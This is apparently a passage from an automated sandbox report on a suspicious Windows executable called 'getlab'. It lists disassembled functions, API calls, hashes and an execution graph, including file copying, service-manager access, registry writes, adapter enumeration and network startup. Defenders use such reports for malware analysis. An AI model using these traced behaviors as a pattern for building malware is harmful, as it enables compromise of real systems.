                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocByteCharFreeMultiWide
                                                                          • String ID: NIL Interface Exception$Unknown Method
                                                                          • API String ID: 3952431833-1023667238
                                                                          • Opcode ID: 456d6725a948a64f68b75857ecf673ecd15b77dd67b08c070dfb7a2d7b0a1602
                                                                          • Instruction ID: e495528c603fed7e49a6c7636a2d67f8de45625ce5c80b81863372b855da2a7d
                                                                          • Opcode Fuzzy Hash: 456d6725a948a64f68b75857ecf673ecd15b77dd67b08c070dfb7a2d7b0a1602
                                                                          • Instruction Fuzzy Hash: 7A11D670604208AFEB14DFA58952A6EBFBCEB08304F91447EF504E7282D7789D05CB69
                                                                          Function 004958AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495974,?,00495968,00000000,0049594F), ref: 0049591A
                                                                          • CloseHandle.KERNEL32(004959B4,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495974,?,00495968,00000000), ref: 00495931
                                                                            • Part of subcall function 00495804: GetLastError.KERNEL32(00000000,0049589C,?,?,?,?), ref: 00495828
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorHandleLastProcess
                                                                          • String ID: <cI
                                                                          • API String ID: 3798668922-2480932022
                                                                          • Opcode ID: 34c6542742eff2dadab3d088a7a61d5c053afa182c64a6caa50429fa903ca566
                                                                          • Instruction ID: 6201355901f458c0f36557428e85d419ca31de49550c26c5d668688d9bb1e683
                                                                          • Opcode Fuzzy Hash: 34c6542742eff2dadab3d088a7a61d5c053afa182c64a6caa50429fa903ca566
                                                                          • Instruction Fuzzy Hash: 660161B1644648AFEF05DBA2DC42FAEBBACDF48714F61003BF504E7291D6785E05CA68
                                                                          Function 0042DD5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD70
                                                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Value$EnumQuery
                                                                          • String ID: Inno Setup: No Icons
                                                                          • API String ID: 1576479698-2016326496
                                                                          • Opcode ID: 388e812ecd06e97e1b31d188035ef8f8b81e1277dc232162d6a0b94f1a497a96
                                                                          • Instruction ID: 0d60c2ceabc561baab214a4f8badfae1c51fae2703c03b7062d0178a0b9483fa
                                                                          • Opcode Fuzzy Hash: 388e812ecd06e97e1b31d188035ef8f8b81e1277dc232162d6a0b94f1a497a96
                                                                          • Instruction Fuzzy Hash: C3012632B55B307AFB3085256C42F7B568CCF46B60F68003BF981EA2C1D6989C04936E
                                                                          Function 00497510 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0047C8B0: FreeLibrary.KERNEL32(73400000,00480FF3), ref: 0047C8C6
                                                                            • Part of subcall function 0047C580: GetTickCount.KERNEL32 ref: 0047C5CA
                                                                            • Part of subcall function 004570B4: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004570D3
                                                                          • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00497E67), ref: 00497565
                                                                          • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00497E67), ref: 0049756B
                                                                          Strings
                                                                          • Detected restart. Removing temporary directory., xrefs: 0049751F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                          • String ID: Detected restart. Removing temporary directory.
                                                                          • API String ID: 1717587489-3199836293
                                                                          • Opcode ID: 10733e8d0c2fcbcf81e8bc1e4ca83bd3e168a9b9b9b758ab357db50908ba3c86
                                                                          • Instruction ID: 3a6ec644de21484b963019a16799c2105d01f9358526232ca3662f3e81dafe78
                                                                          • Opcode Fuzzy Hash: 10733e8d0c2fcbcf81e8bc1e4ca83bd3e168a9b9b9b758ab357db50908ba3c86
                                                                          • Instruction Fuzzy Hash: C5E0E57121C6007EDE4177B6BC6295B3F9CD745778752483BF40881952E52D5810C6BD
                                                                          Function 00403344 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(00000000,004980C2), ref: 0040334B
                                                                          • GetCommandLineA.KERNEL32(00000000,004980C2), ref: 00403356
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CommandHandleLineModule
                                                                          • String ID: (6W
                                                                          • API String ID: 2123368496-3037502312
                                                                          • Opcode ID: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                          • Instruction ID: ff8fa06d391bd0b31f892a344b3e95d40f530220570fde7b1ba7fad45aeb04f1
                                                                          • Opcode Fuzzy Hash: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                          • Instruction Fuzzy Hash: 45C002609013058AD754AF7579467162A94D751349F80447FF114BA3E1D77C82055BDD
                                                                          Function 00455648 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastSleep
                                                                          • String ID:
                                                                          • API String ID: 1458359878-0
                                                                          • Opcode ID: defff66af4325d3c28b570447d2f47c0b7c8b64933ddb782de5565f815c6b007
                                                                          • Instruction ID: de14e8d07cc4d1fec6b94f0f99926b65e7014e25a7505cf550c56fab82152177
                                                                          • Opcode Fuzzy Hash: defff66af4325d3c28b570447d2f47c0b7c8b64933ddb782de5565f815c6b007
                                                                          • Instruction Fuzzy Hash: 91F0F672640954978A20B5DB89A1A3F724CDA94365760012BEC0CD7203C579CC494BAD

                                                                          Execution Graph

                                                                          Execution Coverage:2.7%
                                                                          Dynamic/Decrypted Code Coverage:83.8%
                                                                          Signature Coverage:13.9%
                                                                          Total number of Nodes:1041
                                                                          Total number of Limit Nodes:38
                                                                          execution_graph 60584 40d801 lstrcmpiW 60585 40d3fa 60584->60585 60586 40d00d VirtualAlloc 60587 403310 GetVersion 60611 404454 HeapCreate 60587->60611 60589 40336f 60590 403374 60589->60590 60591 40337c 60589->60591 60686 40342b 8 API calls 60590->60686 60623 404134 60591->60623 60595 403384 GetCommandLineA 60637 404002 60595->60637 60599 40339e 60669 403cfc 60599->60669 60601 4033a3 60602 4033a8 GetStartupInfoA 60601->60602 60682 403ca4 60602->60682 60604 4033ba GetModuleHandleA 60606 4033de 60604->60606 60687 403a4b GetCurrentProcess TerminateProcess ExitProcess 60606->60687 60608 4033e7 60688 403b20 UnhandledExceptionFilter 60608->60688 60610 4033f8 60612 404474 60611->60612 60613 4044aa 60611->60613 60689 40430c 19 API calls 60612->60689 60613->60589 60615 404479 60616 404490 60615->60616 60617 404483 60615->60617 60619 4044ad 60616->60619 60691 40507c HeapAlloc VirtualAlloc VirtualAlloc VirtualFree HeapFree 60616->60691 60690 40482b HeapAlloc 60617->60690 60619->60589 60620 40448d 60620->60619 60622 40449e HeapDestroy 60620->60622 60622->60613 60692 40344f 60623->60692 60626 404153 GetStartupInfoA 60629 404264 60626->60629 60630 40419f 60626->60630 60631 40428b GetStdHandle 60629->60631 60633 4042cb SetHandleCount 60629->60633 60630->60629 60632 404210 60630->60632 60635 40344f 12 API calls 60630->60635 60631->60629 60634 404299 GetFileType 60631->60634 60632->60629 60636 404232 GetFileType 60632->60636 60633->60595 60634->60629 60635->60630 60636->60632 60638 404050 60637->60638 60639 40401d GetEnvironmentStringsW 60637->60639 60641 404025 60638->60641 60642 404041 60638->60642 60640 404031 GetEnvironmentStrings 60639->60640 60639->60641 60640->60642 60643 403394 60640->60643 60644 40405d GetEnvironmentStringsW 60641->60644 60647 404069 60641->60647 60642->60643 60645 4040e3 GetEnvironmentStrings 60642->60645 60646 4040ef 60642->60646 60660 403db5 60643->60660 60644->60643 60644->60647 60645->60643 60645->60646 60651 40344f 12 API calls 60646->60651 60647->60647 60648 40407e WideCharToMultiByte 60647->60648 60649 40409d 60648->60649 60650 4040cf FreeEnvironmentStringsW 60648->60650 60652 40344f 12 API calls 60649->60652 60650->60643 60658 40410a 60651->60658 60653 4040a3 60652->60653 60653->60650 60654 4040ac WideCharToMultiByte 60653->60654 60656 4040c6 60654->60656 60657 4040bd 60654->60657 60655 404120 FreeEnvironmentStringsA 60655->60643 60656->60650 60701 403501 60657->60701 60658->60655 60661 403dc7 60660->60661 60662 403dcc GetModuleFileNameA 60660->60662 60714 406614 19 API calls 60661->60714 60664 403def 60662->60664 60665 40344f 12 API calls 60664->60665 60666 403e10 60665->60666 60667 403e20 60666->60667 60715 403406 7 API calls 60666->60715 60667->60599 60670 403d09 60669->60670 60673 403d0e 60669->60673 60716 406614 19 API calls 60670->60716 60672 40344f 12 API calls 60674 403d3b 60672->60674 60673->60672 60680 403d4f 60674->60680 60717 403406 7 API calls 60674->60717 60676 403d92 60677 403501 7 API calls 60676->60677 60678 403d9e 60677->60678 60678->60601 60679 40344f 12 API calls 60679->60680 60680->60676 60680->60679 60718 403406 7 API calls 60680->60718 60683 403cad 60682->60683 60685 403cb2 60682->60685 60719 406614 19 API calls 60683->60719 60685->60604 60687->60608 60688->60610 60689->60615 60690->60620 60691->60620 60696 403461 60692->60696 60695 403406 7 API calls 60695->60626 60697 40345e 60696->60697 60699 403468 60696->60699 60697->60626 60697->60695 60699->60697 60700 40348d 12 API calls 60699->60700 60700->60699 60702 403529 60701->60702 60703 40350d 60701->60703 60702->60656 60704 403517 60703->60704 60705 40352d 60703->60705 60707 403559 HeapFree 60704->60707 60708 403523 60704->60708 60706 403558 60705->60706 60710 403547 60705->60710 60706->60707 60707->60702 60712 40489e VirtualFree VirtualFree HeapFree 60708->60712 60713 40532f VirtualFree HeapFree VirtualFree 60710->60713 60712->60702 60713->60702 60714->60662 60715->60667 60716->60673 60717->60680 60718->60680 60719->60685 60720 2ddf3cf 60721 2e2c174 60720->60721 60725 2d9f8a3 CreateFileA 60721->60725 60722 2e2c179 60724 2d9f8a3 64 API calls 60722->60724 60724->60722 60726 2d9f99f 60725->60726 60731 2d9f8d4 60725->60731 60726->60722 60727 2d9f8ec DeviceIoControl 60727->60731 60728 2d9f995 CloseHandle 60728->60726 60729 2d9f961 GetLastError 60729->60728 60729->60731 60731->60727 60731->60728 60731->60729 60732 2da3b4c 60731->60732 60734 2da3b54 60732->60734 60735 2da3b6e 60734->60735 60737 2da3b72 std::exception::exception 60734->60737 60740 2da2fac 60734->60740 60757 2da8204 RtlDecodePointer 60734->60757 60735->60731 60758 2da455a RaiseException 60737->60758 60739 2da3b9c 60741 2da3027 60740->60741 60754 2da2fb8 60740->60754 60765 2da8204 RtlDecodePointer 60741->60765 60743 2da302d 60766 2da5e5b 59 API calls __getptd_noexit 60743->60766 60746 2da2feb RtlAllocateHeap 60746->60754 60756 2da301f 60746->60756 60748 2da3013 60763 2da5e5b 59 API calls __getptd_noexit 60748->60763 60752 2da3011 60764 2da5e5b 59 API calls __getptd_noexit 60752->60764 60753 2da2fc3 60753->60754 60759 2da86d4 59 API calls __NMSG_WRITE 60753->60759 60760 2da8731 59 API calls 7 library calls 60753->60760 60761 2da831d GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 60753->60761 60754->60746 60754->60748 60754->60752 60754->60753 60762 2da8204 RtlDecodePointer 60754->60762 60756->60734 60757->60734 60758->60739 60759->60753 60760->60753 60762->60754 60763->60752 60764->60756 60765->60743 60766->60756 60767 2d9648b RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 60806 2d942c7 60767->60806 60769 2d964f3 GetTickCount 60770 2d9605a 59 API calls 60769->60770 60771 2d96508 GetVersionExA 60770->60771 60772 2d96549 __cftof2_l 60771->60772 60773 2da2fac _malloc 59 API calls 60772->60773 60774 2d96556 60773->60774 60775 2da2fac _malloc 59 API calls 60774->60775 60776 2d96566 60775->60776 60777 2da2fac _malloc 59 API calls 60776->60777 60778 2d96571 60777->60778 60779 2da2fac _malloc 59 API calls 60778->60779 60780 2d9657c 60779->60780 60781 2da2fac _malloc 59 API calls 60780->60781 60782 2d96587 60781->60782 60783 2da2fac _malloc 59 API calls 60782->60783 60784 2d96592 60783->60784 60785 2da2fac _malloc 59 API calls 60784->60785 60786 2d9659d 60785->60786 60787 2da2fac _malloc 59 API calls 60786->60787 60788 2d965ac 6 API calls 60787->60788 60789 2d965ff __cftof2_l 60788->60789 60790 2d96618 RtlEnterCriticalSection RtlLeaveCriticalSection 60789->60790 60791 2da2fac _malloc 59 API calls 60790->60791 60792 2d96657 60791->60792 60793 2da2fac _malloc 59 API calls 60792->60793 60794 2d96665 60793->60794 60795 2da2fac _malloc 59 API calls 60794->60795 60796 2d9666c 60795->60796 60797 2da2fac _malloc 59 API calls 60796->60797 60798 2d96692 QueryPerformanceCounter Sleep 60797->60798 60799 2da2fac _malloc 59 API calls 60798->60799 60800 2d966bf 60799->60800 60801 2da2fac _malloc 59 API calls 60800->60801 60802 2d966cc __cftof2_l 60801->60802 60803 2d96708 Sleep 60802->60803 60804 2d9670e RtlEnterCriticalSection RtlLeaveCriticalSection 60802->60804 60803->60804 60805 2d96744 __cftof2_l 60804->60805 60807 402c93 RegQueryValueExA 60809 4022bc 60807->60809 60808 40d4cc RegCloseKey 60808->60809 60809->60808 60810 40d794 60809->60810 60811 2d9104d 60816 2da33a4 60811->60816 60822 2da32a8 60816->60822 60818 2d91057 60819 2d91aa9 InterlockedIncrement 60818->60819 60820 2d9105c 60819->60820 60821 2d91ac5 WSAStartup InterlockedExchange 60819->60821 60821->60820 60823 2da32b4 __alloc_osfhnd 60822->60823 60830 2da8593 60823->60830 60829 2da32db __alloc_osfhnd 60829->60818 60847 2da88ee 60830->60847 60832 2da32bd 60833 2da32ec RtlDecodePointer RtlDecodePointer 60832->60833 60834 2da32c9 60833->60834 60835 2da3319 60833->60835 60844 2da32e6 60834->60844 60835->60834 60856 2da915d 60 API calls 2 library calls 60835->60856 60837 2da337c RtlEncodePointer RtlEncodePointer 60837->60834 60838 2da332b 60838->60837 60839 2da3350 60838->60839 60857 2da8afc 62 API calls 2 library calls 60838->60857 60839->60834 60842 2da336a RtlEncodePointer 60839->60842 60858 2da8afc 62 API calls 2 library calls 60839->60858 60842->60837 60843 2da3364 60843->60834 60843->60842 60859 2da859c 60844->60859 60848 2da88ff 60847->60848 60849 2da8912 RtlEnterCriticalSection 60847->60849 60854 2da8976 59 API calls 9 library calls 60848->60854 60849->60832 60851 2da8905 60851->60849 60855 2da8440 59 API calls 3 library calls 60851->60855 60854->60851 60856->60838 60857->60839 60858->60843 60862 2da8a58 RtlLeaveCriticalSection 60859->60862 60861 2da32eb 60861->60829 60862->60861 60863 2df020b 60864 2e2c6f2 SHGetSpecialFolderPathA 60863->60864 60865 2e2c6fd 60864->60865 60866 402694 60867 402753 CopyFileA 60866->60867 60868 402759 OpenSCManagerA 60867->60868 60869 402aef 60868->60869 60869->60868 60870 40d68e 60869->60870 60871 40d556 60872 40dca1 60871->60872 60873 40dbc9 Sleep 60872->60873 60875 2da3d0f 60872->60875 60873->60872 60876 2da3d18 60875->60876 60877 2da3d1d 60875->60877 60889 2dab8e1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 60876->60889 60881 2da3d32 60877->60881 60880 2da3d2b 60880->60872 60882 2da3d3e __alloc_osfhnd 60881->60882 60886 2da3d8c ___DllMainCRTStartup 60882->60886 60888 2da3de9 __alloc_osfhnd 60882->60888 60890 2da3b9d 60882->60890 60884 2da3dc6 60885 2da3b9d __CRT_INIT@12 138 API calls 60884->60885 60884->60888 60885->60888 60886->60884 60887 2da3b9d __CRT_INIT@12 138 API calls 60886->60887 60886->60888 60887->60884 60888->60880 60889->60877 60891 2da3ba9 __alloc_osfhnd 60890->60891 60892 2da3c2b 60891->60892 60893 2da3bb1 60891->60893 60895 2da3c94 60892->60895 60899 2da3c2f 60892->60899 60938 2da81e7 GetProcessHeap 60893->60938 60897 2da3c99 60895->60897 60898 2da3cf7 60895->60898 60896 2da3bb6 60909 2da3bba __alloc_osfhnd __CRT_INIT@12 60896->60909 60939 2da5d94 60896->60939 61032 2da91cb 60897->61032 60898->60909 61058 2da5c24 59 API calls 2 library calls 60898->61058 60900 2da3c50 60899->60900 60899->60909 61027 2da845c 59 API calls _doexit 60899->61027 61028 2da8333 61 API calls _free 60900->61028 60905 2da3ca4 60905->60909 61035 2da8a6d 60905->61035 60907 2da3bc6 __RTC_Initialize 60907->60909 60916 2da3bd6 GetCommandLineA 60907->60916 60908 2da3c55 60911 2da3c66 __CRT_INIT@12 60908->60911 61029 2dab57f 60 API calls _free 60908->61029 60909->60886 61031 2da3c7f 62 API calls __mtterm 60911->61031 60915 2da3c61 61030 2da5e0a 62 API calls 2 library calls 60915->61030 60960 2dab97d GetEnvironmentStringsW 60916->60960 60920 2da3ccd 60922 2da3ceb 60920->60922 60923 2da3cd3 60920->60923 61052 2da2f74 60922->61052 61042 2da5ce1 60923->61042 60927 2da3bf0 60929 2da3bf4 60927->60929 60992 2dab5d1 60927->60992 60928 2da3cdb GetCurrentThreadId 60928->60909 61025 2da5e0a 62 API calls 2 library calls 60929->61025 60933 2da3c14 60933->60909 61026 2dab57f 60 API calls _free 60933->61026 60938->60896 61059 2da8503 36 API calls 2 library calls 60939->61059 60941 2da5d99 61060 2da8a1f InitializeCriticalSectionAndSpinCount __alloc_osfhnd 60941->61060 60943 2da5d9e 60944 2da5da2 60943->60944 61062 2da918e TlsAlloc 60943->61062 61061 2da5e0a 62 API calls 2 library calls 60944->61061 60947 2da5da7 60947->60907 60948 2da5db4 60948->60944 60949 2da5dbf 60948->60949 60950 2da8a6d __calloc_crt 59 API calls 60949->60950 60951 2da5dcc 60950->60951 60952 2da5e01 60951->60952 61063 2da91ea TlsSetValue 60951->61063 61064 2da5e0a 62 API calls 2 library calls 60952->61064 60955 2da5e06 60955->60907 60956 2da5de0 60956->60952 60957 2da5de6 60956->60957 60958 2da5ce1 __initptd 59 API calls 60957->60958 60959 2da5dee GetCurrentThreadId 60958->60959 60959->60907 60961 2dab990 WideCharToMultiByte 60960->60961 60962 2da3be6 60960->60962 60964 2dab9fa FreeEnvironmentStringsW 60961->60964 60965 2dab9c3 60961->60965 60973 2dab2cb 60962->60973 60964->60962 61065 2da8ab5 59 API calls 2 library calls 60965->61065 60967 2dab9c9 60967->60964 60968 2dab9d0 WideCharToMultiByte 60967->60968 60969 2dab9ef FreeEnvironmentStringsW 60968->60969 60970 2dab9e6 60968->60970 60969->60962 60971 2da2f74 _free 59 API calls 60970->60971 60972 2dab9ec 60971->60972 60972->60969 60974 2dab2d7 __alloc_osfhnd 60973->60974 60975 2da88ee __lock 59 API calls 60974->60975 60976 2dab2de 60975->60976 60977 2da8a6d __calloc_crt 59 API calls 60976->60977 60979 2dab2ef 60977->60979 60978 2dab35a GetStartupInfoW 60980 2dab36f 60978->60980 60989 2dab49e 60978->60989 60979->60978 60981 2dab2fa __alloc_osfhnd @_EH4_CallFilterFunc@8 60979->60981 60984 2da8a6d __calloc_crt 59 API calls 60980->60984 60987 2dab3bd 60980->60987 60980->60989 60981->60927 60982 2dab566 61068 2dab576 RtlLeaveCriticalSection _doexit 60982->61068 60984->60980 60985 2dab4eb GetStdHandle 60985->60989 60986 2dab4fe GetFileType 60986->60989 60988 2dab3f1 GetFileType 60987->60988 60987->60989 61066 2da920c InitializeCriticalSectionAndSpinCount 60987->61066 60988->60987 60989->60982 60989->60985 60989->60986 61067 2da920c InitializeCriticalSectionAndSpinCount 60989->61067 60993 2dab5df 60992->60993 60994 2dab5e4 GetModuleFileNameA 60992->60994 61075 2da528a 71 API calls __setmbcp 60993->61075 60996 2dab611 60994->60996 61069 2dab684 60996->61069 61000 2dab64a 61001 2dab684 _parse_cmdline 59 API calls 61000->61001 61002 2da3c00 61000->61002 61001->61002 61002->60933 61003 2dab800 61002->61003 61004 2dab809 61003->61004 61006 2dab80e _strlen 61003->61006 61079 2da528a 71 API calls __setmbcp 61004->61079 61007 2da8a6d __calloc_crt 59 API calls 61006->61007 61010 2da3c09 61006->61010 61015 2dab844 _strlen 61007->61015 61008 2dab896 61009 2da2f74 _free 59 API calls 61008->61009 61009->61010 61010->60933 61019 2da846b 61010->61019 61011 2da8a6d __calloc_crt 59 API calls 61011->61015 61012 2dab8bd 61014 2da2f74 _free 59 API calls 61012->61014 61014->61010 61015->61008 61015->61010 61015->61011 61015->61012 61016 2dab8d4 61015->61016 61080 2da6cbc 59 API calls 2 library calls 61015->61080 61081 2da4f05 8 API calls 2 library calls 61016->61081 61018 2dab8e0 61021 2da8477 __IsNonwritableInCurrentImage 61019->61021 61082 2dad2df 61021->61082 61022 2da8495 __initterm_e 61023 2da33a4 __cinit 68 API calls 61022->61023 61024 2da84b4 _doexit __IsNonwritableInCurrentImage 61022->61024 61023->61024 61024->60933 61025->60909 61026->60929 61027->60900 61028->60908 61029->60915 61030->60911 61031->60909 61033 2da91de 61032->61033 61034 2da91e2 TlsGetValue 61032->61034 61033->60905 61034->60905 61036 2da8a74 61035->61036 61038 2da3cb5 61036->61038 61040 2da8a92 61036->61040 61085 2db04b8 61036->61085 61038->60909 61041 2da91ea TlsSetValue 61038->61041 61040->61036 61040->61038 61093 2da9505 Sleep 61040->61093 61041->60920 61043 2da5ced __alloc_osfhnd 61042->61043 61044 2da88ee __lock 59 API calls 61043->61044 61045 2da5d2a 61044->61045 61096 2da5d82 61045->61096 61048 2da88ee __lock 59 API calls 61049 2da5d4b ___addlocaleref 61048->61049 61099 2da5d8b 61049->61099 61051 2da5d76 __alloc_osfhnd 61051->60928 61053 2da2f7d HeapFree 61052->61053 61057 2da2fa6 __dosmaperr 61052->61057 61054 2da2f92 61053->61054 61053->61057 61104 2da5e5b 59 API calls __getptd_noexit 61054->61104 61056 2da2f98 GetLastError 61056->61057 61057->60909 61058->60909 61059->60941 61060->60943 61061->60947 61062->60948 61063->60956 61064->60955 61065->60967 61066->60987 61067->60989 61068->60981 61071 2dab6a6 61069->61071 61074 2dab70a 61071->61074 61077 2db15d6 59 API calls x_ismbbtype_l 61071->61077 61072 2dab627 61072->61002 61076 2da8ab5 59 API calls 2 library calls 61072->61076 61074->61072 61078 2db15d6 59 API calls x_ismbbtype_l 61074->61078 61075->60994 61076->61000 61077->61071 61078->61074 61079->61006 61080->61015 61081->61018 61083 2dad2e2 RtlEncodePointer 61082->61083 61083->61083 61084 2dad2fc 61083->61084 61084->61022 61086 2db04c3 61085->61086 61092 2db04de 61085->61092 61087 2db04cf 61086->61087 61086->61092 61094 2da5e5b 59 API calls __getptd_noexit 61087->61094 61088 2db04ee RtlAllocateHeap 61090 2db04d4 61088->61090 61088->61092 61090->61036 61092->61088 61092->61090 61095 2da8204 RtlDecodePointer 61092->61095 61093->61040 61094->61090 61095->61092 61102 2da8a58 RtlLeaveCriticalSection 61096->61102 61098 2da5d44 61098->61048 61103 2da8a58 RtlLeaveCriticalSection 61099->61103 61101 2da5d92 61101->61051 61102->61098 61103->61101 61104->61056 61105 4026d6 61106 4026db 61105->61106 61107 40da35 RegCreateKeyExA 61106->61107 61108 40d866 SetEvent 61106->61108 61110 4026de 61106->61110 61109 40dae1 61107->61109 61111 40d8f7 61108->61111 61109->61108 61109->61110 61111->61111 61112 402998 GetLocalTime 61115 401f27 61112->61115 61114 4029f5 61116 401f3c 61115->61116 61119 401a1d 61116->61119 61118 401f45 61118->61114 61118->61118 61120 401a2c 61119->61120 61125 401a4f CreateFileA 61120->61125 61124 401a3e 61124->61118 61126 401a35 61125->61126 61130 401a7d 61125->61130 61133 401b4b LoadLibraryA 61126->61133 61127 401a98 DeviceIoControl 61127->61130 61129 401b3a CloseHandle 61129->61126 61130->61127 61130->61129 61131 401b0e GetLastError 61130->61131 61142 403106 7 API calls 61130->61142 61143 4030f8 12 API calls 61130->61143 61131->61129 61131->61130 61134 401c21 61133->61134 61135 401b6e GetProcAddress 61133->61135 61134->61124 61136 401b85 61135->61136 61137 401c18 FreeLibrary 61135->61137 61138 401b95 GetAdaptersInfo 61136->61138 61139 401c15 61136->61139 61144 403106 7 API calls 61136->61144 61145 4030f8 12 API calls 61136->61145 61137->61134 61138->61136 61139->61137 61142->61130 61143->61130 61144->61136 61145->61136 61146 40d39b LoadLibraryExA 61147 40d320 Sleep 61148 2dd36bc 61149 2e0aa7a CreateFileA 61148->61149 